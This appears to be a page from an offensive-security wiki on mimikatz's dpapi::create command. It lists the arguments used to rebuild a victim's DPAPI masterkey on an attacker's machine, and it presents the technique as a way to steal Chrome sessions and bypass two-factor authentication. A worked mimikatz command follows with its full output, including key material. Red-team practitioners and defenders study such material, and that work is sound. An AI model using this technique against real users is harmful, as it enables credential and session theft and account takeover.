create πŸ› οΈ
dpapi::create creates a DPAPI Masterkey file from raw key and metadata. It comes in handy when you want to decrypt a victim's DPAPI secrets locally in your machine. CoreSecurity has published a guide on how you can clone the Google Chrome Victim's session and decrypt it from your own box. Benjamin has also tweeted how you can recreate masterkeys on your own machine to steal browser sessions and bypass 2FA. It has the following command line arguments:
  • /sid: the Security Identifier of the target user
  • /md4: the MD4 key
  • /key: The masterkey. It can be obtained through sekurlsa::dpapi``
  • /sha1: the SHA1 key. It can be obtained through sekurlsa::dpapi``
  • /hash: the SHA1 hash of YOUR password when porting the victim's DPAPI files to your system
  • /dpapi: TODO πŸ› οΈ
  • /guid: the user's GUID. it can be obtained through sekurlsa::dpapi. it is also the szGuid output value of the dpapi::masterkey in:"C:\Users<UserName>\AppData\Roaming\Microsoft\Protect\SID\MasterKey_ID" /rpc
  • /system: the DPAPI_SYSTEM key. It can be found through lsadump::secrets​
  • /password: This is YOUR password when porting the victim's DPAPI files to your system
  • /protected: it defines the user account as a protected one
1
mimikatz # dpapi::create /guid:{5c22983f-77ee-41e4-9086-8073d664e417} /key:3f7a17dd6658319fcd4b832afc20ac7dacbb9d7cd668527c71f98e90464624634c614a7923a3beb23c4e24dd718f2a8e838ce72935fb29f11507affb543a53c3 /password:Super_SecretPass /protected
2
Target SID is: S-1-5-21-2725560159-1428537199-2260736313-1730
3
​
4
[masterkey] with password: Super_SecretPass (protected user)
5
Key GUID: {5c22983f-77ee-41e4-9086-8073d664e417}
6
**MASTERKEYS**
7
dwVersion : 00000002 - 2
8
szGuid : {5c22983f-77ee-41e4-9086-8073d664e417}
9
dwFlags : 00000000 - 0
10
dwMasterKeyLen : 00000108 - 264
11
dwBackupKeyLen : 00000000 - 0
12
dwCredHistLen : 00000000 - 0
13
dwDomainKeyLen : 00000000 - 0
14
[masterkey]
15
**MASTERKEY**
16
dwVersion : 00000002 - 2
17
salt : 5c765e71ed00a886cb27b5ab5ea2ff19
18
rounds : 00000fa0 - 4000
19
algHash : 00008009 - 32777 (CALG_HMAC)
20
algCrypt : 00006603 - 26115 (CALG_3DES)
21
pbKey : 2a10ef754addc9bfcea06565e1a8fe388e4bdca26bca4c85ba2420bdfccacc343dff4ea9021ad55b6ea2f1bcfcbe95fe2f0ad6eece14e3a5797aa0957b09601f42d87ec03885cc82b2c208160e182518c9840df006d0f312d6cde65854ef8b0da26f252f7f0ad9f2
22
​
23
​
24
File '5c22983f-77ee-41e4-9086-8073d664e417' (hidden & system): OK
Copied!
Last modified 6mo ago
Copy link